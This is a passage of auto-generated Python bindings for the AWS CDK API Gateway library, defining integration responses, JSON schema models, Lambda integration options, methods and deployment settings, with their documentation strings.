:param response_parameters: The response parameters from the backend response that API Gateway sends to the method response. Use the destination as the key and the source as the value: - The destination must be an existing response parameter in the MethodResponse property. - The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on the destination specified in the request.
:param response_templates: The templates that are used to transform the integration response body. Specify templates as key-value pairs, with a content type as the key and a template as the value.
:param selection_pattern: Specifies the regular expression (regex) pattern used to choose an integration response based on the response from the back end. For example, if the success response returns nothing and the error response returns some string, you could use the ``.+`` regex to match error response. However, make sure that the error response does not contain any newline (``\n``) character in such cases. If the back end is an AWS Lambda function, the AWS Lambda function error header is matched. For all other HTTP and AWS back ends, the HTTP status code is matched.
"""
self._values = {
'status_code': status_code,
}
if content_handling is not None: self._values["content_handling"] = content_handling
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if selection_pattern is not None: self._values["selection_pattern"] = selection_pattern
@property
def status_code(self) -> str:
"""The status code that API Gateway uses to map the integration response to a MethodResponse status code."""
return self._values.get('status_code')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none the request payload is passed through from the method
request to the integration request without modification.
"""
return self._values.get('content_handling')
@property
def response_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The response parameters from the backend response that API Gateway sends to the method response.
Use the destination as the key and the source as the value:
- The destination must be an existing response parameter in the
MethodResponse property.
- The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on the destination specified in the
request.
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/request-response-data-mappings.html
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The templates that are used to transform the integration response body. Specify templates as key-value pairs, with a content type as the key and a template as the value.
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('response_templates')
@property
def selection_pattern(self) -> typing.Optional[str]:
"""Specifies the regular expression (regex) pattern used to choose an integration response based on the response from the back end.
For example, if the success response returns nothing and the error response returns some string, you
could use the ``.+`` regex to match error response. However, make sure that the error response does not contain any
newline (``\n``) character in such cases. If the back end is an AWS Lambda function, the AWS Lambda function error
header is matched. For all other HTTP and AWS back ends, the HTTP status code is matched.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-integration-settings-integration-response.html
"""
return self._values.get('selection_pattern')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationResponse(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.IntegrationType")
class IntegrationType(enum.Enum):
AWS = "AWS"
"""For integrating the API method request with an AWS service action, including the Lambda function-invoking action.
With the Lambda
function-invoking action, this is referred to as the Lambda custom
integration. With any other AWS service action, this is known as AWS
integration.
"""
AWS_PROXY = "AWS_PROXY"
"""For integrating the API method request with the Lambda function-invoking action with the client request passed through as-is.
This integration is
also referred to as the Lambda proxy integration
"""
HTTP = "HTTP"
"""For integrating the API method request with an HTTP endpoint, including a private HTTP endpoint within a VPC.
This integration is also referred to
as the HTTP custom integration.
"""
HTTP_PROXY = "HTTP_PROXY"
"""For integrating the API method request with an HTTP endpoint, including a private HTTP endpoint within a VPC, with the client request passed through as-is.
This is also referred to as the HTTP proxy integration
"""
MOCK = "MOCK"
"""For integrating the API method request with API Gateway as a "loop-back" endpoint without invoking any backend."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.JsonSchema", jsii_struct_bases=[], name_mapping={'additional_items': 'additionalItems', 'additional_properties': 'additionalProperties', 'all_of': 'allOf', 'any_of': 'anyOf', 'contains': 'contains', 'definitions': 'definitions', 'dependencies': 'dependencies', 'description': 'description', 'enum': 'enum', 'exclusive_maximum': 'exclusiveMaximum', 'exclusive_minimum': 'exclusiveMinimum', 'format': 'format', 'id': 'id', 'items': 'items', 'maximum': 'maximum', 'max_items': 'maxItems', 'max_length': 'maxLength', 'max_properties': 'maxProperties', 'minimum': 'minimum', 'min_items': 'minItems', 'min_length': 'minLength', 'min_properties': 'minProperties', 'multiple_of': 'multipleOf', 'not_': 'not', 'one_of': 'oneOf', 'pattern': 'pattern', 'pattern_properties': 'patternProperties', 'properties': 'properties', 'property_names': 'propertyNames', 'ref': 'ref', 'required': 'required', 'schema': 'schema', 'title': 'title', 'type': 'type', 'unique_items': 'uniqueItems'})
class JsonSchema():
def __init__(self, *, additional_items: typing.Optional[typing.List["JsonSchema"]]=None, additional_properties: typing.Optional[bool]=None, all_of: typing.Optional[typing.List["JsonSchema"]]=None, any_of: typing.Optional[typing.List["JsonSchema"]]=None, contains: typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]=None, definitions: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, dependencies: typing.Optional[typing.Mapping[str,typing.Union["JsonSchema", typing.List[str]]]]=None, description: typing.Optional[str]=None, enum: typing.Optional[typing.List[typing.Any]]=None, exclusive_maximum: typing.Optional[bool]=None, exclusive_minimum: typing.Optional[bool]=None, format: typing.Optional[str]=None, id: typing.Optional[str]=None, items: typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]=None, maximum: typing.Optional[jsii.Number]=None, max_items: typing.Optional[jsii.Number]=None, max_length: typing.Optional[jsii.Number]=None, max_properties: typing.Optional[jsii.Number]=None, minimum: typing.Optional[jsii.Number]=None, min_items: typing.Optional[jsii.Number]=None, min_length: typing.Optional[jsii.Number]=None, min_properties: typing.Optional[jsii.Number]=None, multiple_of: typing.Optional[jsii.Number]=None, not_: typing.Optional["JsonSchema"]=None, one_of: typing.Optional[typing.List["JsonSchema"]]=None, pattern: typing.Optional[str]=None, pattern_properties: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, properties: typing.Optional[typing.Mapping[str,"JsonSchema"]]=None, property_names: typing.Optional["JsonSchema"]=None, ref: typing.Optional[str]=None, required: typing.Optional[typing.List[str]]=None, schema: typing.Optional["JsonSchemaVersion"]=None, title: typing.Optional[str]=None, type: typing.Optional[typing.Union[typing.Optional["JsonSchemaType"], typing.Optional[typing.List["JsonSchemaType"]]]]=None, unique_items: typing.Optional[bool]=None):
"""Represents a JSON schema definition of the structure of a REST API model.
Copied from npm module jsonschema.
:param additional_items:
:param additional_properties:
:param all_of:
:param any_of:
:param contains:
:param definitions:
:param dependencies:
:param description:
:param enum:
:param exclusive_maximum:
:param exclusive_minimum:
:param format:
:param id:
:param items:
:param maximum:
:param max_items:
:param max_length:
:param max_properties:
:param minimum:
:param min_items:
:param min_length:
:param min_properties:
:param multiple_of:
:param not_:
:param one_of:
:param pattern:
:param pattern_properties:
:param properties:
:param property_names:
:param ref:
:param required:
:param schema:
:param title:
:param type:
:param unique_items:
see
:see: https://github.com/tdegrunt/jsonschema
"""
if isinstance(not_, dict): not_ = JsonSchema(**not_)
if isinstance(property_names, dict): property_names = JsonSchema(**property_names)
self._values = {
}
if additional_items is not None: self._values["additional_items"] = additional_items
if additional_properties is not None: self._values["additional_properties"] = additional_properties
if all_of is not None: self._values["all_of"] = all_of
if any_of is not None: self._values["any_of"] = any_of
if contains is not None: self._values["contains"] = contains
if definitions is not None: self._values["definitions"] = definitions
if dependencies is not None: self._values["dependencies"] = dependencies
if description is not None: self._values["description"] = description
if enum is not None: self._values["enum"] = enum
if exclusive_maximum is not None: self._values["exclusive_maximum"] = exclusive_maximum
if exclusive_minimum is not None: self._values["exclusive_minimum"] = exclusive_minimum
if format is not None: self._values["format"] = format
if id is not None: self._values["id"] = id
if items is not None: self._values["items"] = items
if maximum is not None: self._values["maximum"] = maximum
if max_items is not None: self._values["max_items"] = max_items
if max_length is not None: self._values["max_length"] = max_length
if max_properties is not None: self._values["max_properties"] = max_properties
if minimum is not None: self._values["minimum"] = minimum
if min_items is not None: self._values["min_items"] = min_items
if min_length is not None: self._values["min_length"] = min_length
if min_properties is not None: self._values["min_properties"] = min_properties
if multiple_of is not None: self._values["multiple_of"] = multiple_of
if not_ is not None: self._values["not_"] = not_
if one_of is not None: self._values["one_of"] = one_of
if pattern is not None: self._values["pattern"] = pattern
if pattern_properties is not None: self._values["pattern_properties"] = pattern_properties
if properties is not None: self._values["properties"] = properties
if property_names is not None: self._values["property_names"] = property_names
if ref is not None: self._values["ref"] = ref
if required is not None: self._values["required"] = required
if schema is not None: self._values["schema"] = schema
if title is not None: self._values["title"] = title
if type is not None: self._values["type"] = type
if unique_items is not None: self._values["unique_items"] = unique_items
@property
def additional_items(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('additional_items')
@property
def additional_properties(self) -> typing.Optional[bool]:
return self._values.get('additional_properties')
@property
def all_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('all_of')
@property
def any_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('any_of')
@property
def contains(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]:
return self._values.get('contains')
@property
def definitions(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('definitions')
@property
def dependencies(self) -> typing.Optional[typing.Mapping[str,typing.Union["JsonSchema", typing.List[str]]]]:
return self._values.get('dependencies')
@property
def description(self) -> typing.Optional[str]:
return self._values.get('description')
@property
def enum(self) -> typing.Optional[typing.List[typing.Any]]:
return self._values.get('enum')
@property
def exclusive_maximum(self) -> typing.Optional[bool]:
return self._values.get('exclusive_maximum')
@property
def exclusive_minimum(self) -> typing.Optional[bool]:
return self._values.get('exclusive_minimum')
@property
def format(self) -> typing.Optional[str]:
return self._values.get('format')
@property
def id(self) -> typing.Optional[str]:
return self._values.get('id')
@property
def items(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchema"], typing.Optional[typing.List["JsonSchema"]]]]:
return self._values.get('items')
@property
def maximum(self) -> typing.Optional[jsii.Number]:
return self._values.get('maximum')
@property
def max_items(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_items')
@property
def max_length(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_length')
@property
def max_properties(self) -> typing.Optional[jsii.Number]:
return self._values.get('max_properties')
@property
def minimum(self) -> typing.Optional[jsii.Number]:
return self._values.get('minimum')
@property
def min_items(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_items')
@property
def min_length(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_length')
@property
def min_properties(self) -> typing.Optional[jsii.Number]:
return self._values.get('min_properties')
@property
def multiple_of(self) -> typing.Optional[jsii.Number]:
return self._values.get('multiple_of')
@property
def not_(self) -> typing.Optional["JsonSchema"]:
return self._values.get('not_')
@property
def one_of(self) -> typing.Optional[typing.List["JsonSchema"]]:
return self._values.get('one_of')
@property
def pattern(self) -> typing.Optional[str]:
return self._values.get('pattern')
@property
def pattern_properties(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('pattern_properties')
@property
def properties(self) -> typing.Optional[typing.Mapping[str,"JsonSchema"]]:
return self._values.get('properties')
@property
def property_names(self) -> typing.Optional["JsonSchema"]:
return self._values.get('property_names')
@property
def ref(self) -> typing.Optional[str]:
return self._values.get('ref')
@property
def required(self) -> typing.Optional[typing.List[str]]:
return self._values.get('required')
@property
def schema(self) -> typing.Optional["JsonSchemaVersion"]:
return self._values.get('schema')
@property
def title(self) -> typing.Optional[str]:
return self._values.get('title')
@property
def type(self) -> typing.Optional[typing.Union[typing.Optional["JsonSchemaType"], typing.Optional[typing.List["JsonSchemaType"]]]]:
return self._values.get('type')
@property
def unique_items(self) -> typing.Optional[bool]:
return self._values.get('unique_items')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'JsonSchema(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.JsonSchemaType")
class JsonSchemaType(enum.Enum):
NULL = "NULL"
BOOLEAN = "BOOLEAN"
OBJECT = "OBJECT"
ARRAY = "ARRAY"
NUMBER = "NUMBER"
INTEGER = "INTEGER"
STRING = "STRING"
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.JsonSchemaVersion")
class JsonSchemaVersion(enum.Enum):
DRAFT4 = "DRAFT4"
"""In API Gateway models are defined using the JSON schema draft 4.
see
:see: https://tools.ietf.org/html/draft-zyp-json-schema-04
"""
DRAFT7 = "DRAFT7"
class LambdaIntegration(AwsIntegration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.LambdaIntegration"):
"""Integrates an AWS Lambda function to an API Gateway method.
Example::
# Example automatically generated. See https://github.com/aws/jsii/issues/826
handler = lambda.Function(self, "MyFunction", ...)
api.add_method("GET", LambdaIntegration(handler))
"""
def __init__(self, handler: aws_cdk.aws_lambda.IFunction, *, allow_test_invoke: typing.Optional[bool]=None, proxy: typing.Optional[bool]=None, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None) -> None:
"""
:param handler: -
:param options: -
:param allow_test_invoke: Allow invoking method from AWS Console UI (for testing purposes). This will add another permission to the AWS Lambda resource policy which will allow the ``test-invoke-stage`` stage to invoke this handler. If this is set to ``false``, the function will only be usable from the deployment endpoint. Default: true
:param proxy: Use proxy integration or normal (request/response mapping) integration. Default: true
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehaviors`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassThrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
options = LambdaIntegrationOptions(allow_test_invoke=allow_test_invoke, proxy=proxy, cache_key_parameters=cache_key_parameters, cache_namespace=cache_namespace, connection_type=connection_type, content_handling=content_handling, credentials_passthrough=credentials_passthrough, credentials_role=credentials_role, integration_responses=integration_responses, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, vpc_link=vpc_link)
jsii.create(LambdaIntegration, self, [handler, options])
@jsii.member(jsii_name="bind")
def bind(self, method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param method: -
"""
return jsii.invoke(self, "bind", [method])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.LambdaIntegrationOptions", jsii_struct_bases=[IntegrationOptions], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials_passthrough': 'credentialsPassthrough', 'credentials_role': 'credentialsRole', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'vpc_link': 'vpcLink', 'allow_test_invoke': 'allowTestInvoke', 'proxy': 'proxy'})
class LambdaIntegrationOptions(IntegrationOptions):
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None, allow_test_invoke: typing.Optional[bool]=None, proxy: typing.Optional[bool]=None):
"""
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehaviors`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassThrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
:param allow_test_invoke: Allow invoking method from AWS Console UI (for testing purposes). This will add another permission to the AWS Lambda resource policy which will allow the ``test-invoke-stage`` stage to invoke this handler. If this is set to ``false``, the function will only be usable from the deployment endpoint. Default: true
:param proxy: Use proxy integration or normal (request/response mapping) integration. Default: true
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials_passthrough is not None: self._values["credentials_passthrough"] = credentials_passthrough
if credentials_role is not None: self._values["credentials_role"] = credentials_role
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if vpc_link is not None: self._values["vpc_link"] = vpc_link
if allow_test_invoke is not None: self._values["allow_test_invoke"] = allow_test_invoke
if proxy is not None: self._values["proxy"] = proxy
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""A list of request parameters whose values are to be cached.
It determines
request parameters that will make it into the cache key.
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""An API-specific tag group of related cached parameters."""
return self._values.get('cache_namespace')
@property
def connection_type(self) -> typing.Optional["ConnectionType"]:
"""The type of network connection to the integration endpoint.
default
:default: ConnectionType.Internet
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none if this property isn't defined, the request payload is passed
through from the method request to the integration request without
modification, provided that the ``passthroughBehaviors`` property is
configured to support payload pass-through.
"""
return self._values.get('content_handling')
@property
def credentials_passthrough(self) -> typing.Optional[bool]:
"""Requires that the caller's identity be passed through from the request.
default
:default: Caller identity is not passed through
"""
return self._values.get('credentials_passthrough')
@property
def credentials_role(self) -> typing.Optional[aws_cdk.aws_iam.IRole]:
"""An IAM role that API Gateway assumes.
Mutually exclusive with ``credentialsPassThrough``.
default
:default: A role is not assumed
"""
return self._values.get('credentials_role')
@property
def integration_responses(self) -> typing.Optional[typing.List["IntegrationResponse"]]:
"""The response that API Gateway provides after a method's backend completes processing a request.
API Gateway intercepts the response from the
backend so that you can control how API Gateway surfaces backend
responses. For example, you can map the backend status codes to codes
that you define.
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional["PassthroughBehavior"]:
"""Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER."""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value.
Specify the destination by using the following pattern
integration.request.location.name, where location is querystring, path,
or header, and name is a valid, unique parameter name.
The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on their destination in the request.
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map of Apache Velocity templates that are applied on the request payload.
The template that API Gateway uses is based on the value of the
Content-Type header that's sent by the client. The content type value is
the key, and the template is the value (specified as a string), such as
the following snippet:
{ "application/json": "{\n "statusCode": "200"\n}" }
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('request_templates')
@property
def vpc_link(self) -> typing.Optional["VpcLink"]:
"""The VpcLink used for the integration. Required if connectionType is VPC_LINK."""
return self._values.get('vpc_link')
@property
def allow_test_invoke(self) -> typing.Optional[bool]:
"""Allow invoking method from AWS Console UI (for testing purposes).
This will add another permission to the AWS Lambda resource policy which
will allow the ``test-invoke-stage`` stage to invoke this handler. If this
is set to ``false``, the function will only be usable from the deployment
endpoint.
default
:default: true
"""
return self._values.get('allow_test_invoke')
@property
def proxy(self) -> typing.Optional[bool]:
"""Use proxy integration or normal (request/response mapping) integration.
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LambdaIntegrationOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class Method(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Method"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, http_method: str, resource: "IResource", integration: typing.Optional["Integration"]=None, options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param http_method: The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method.
:param resource: The resource this method is associated with. For root resource methods, specify the ``RestApi`` object.
:param integration: The backend system that the method calls when it receives a request. Default: - a new ``MockIntegration``.
:param options: Method options. Default: - No options.
"""
props = MethodProps(http_method=http_method, resource=resource, integration=integration, options=options)
jsii.create(Method, self, [scope, id, props])
@property
@jsii.member(jsii_name="httpMethod")
def http_method(self) -> str:
return jsii.get(self, "httpMethod")
@property
@jsii.member(jsii_name="methodArn")
def method_arn(self) -> str:
"""Returns an execute-api ARN for this method:.
arn:aws:execute-api:{region}:{account}:{restApiId}/{stage}/{method}/{path}
NOTE: {stage} will refer to the ``restApi.deploymentStage``, which will
automatically set if auto-deploy is enabled.
attribute:
:attribute:: true
"""
return jsii.get(self, "methodArn")
@property
@jsii.member(jsii_name="methodId")
def method_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "methodId")
@property
@jsii.member(jsii_name="resource")
def resource(self) -> "IResource":
return jsii.get(self, "resource")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="testMethodArn")
def test_method_arn(self) -> str:
"""Returns an execute-api ARN for this method's "test-invoke-stage" stage. This stage is used by the AWS Console UI when testing the method."""
return jsii.get(self, "testMethodArn")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodDeploymentOptions", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodDeploymentOptions():
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
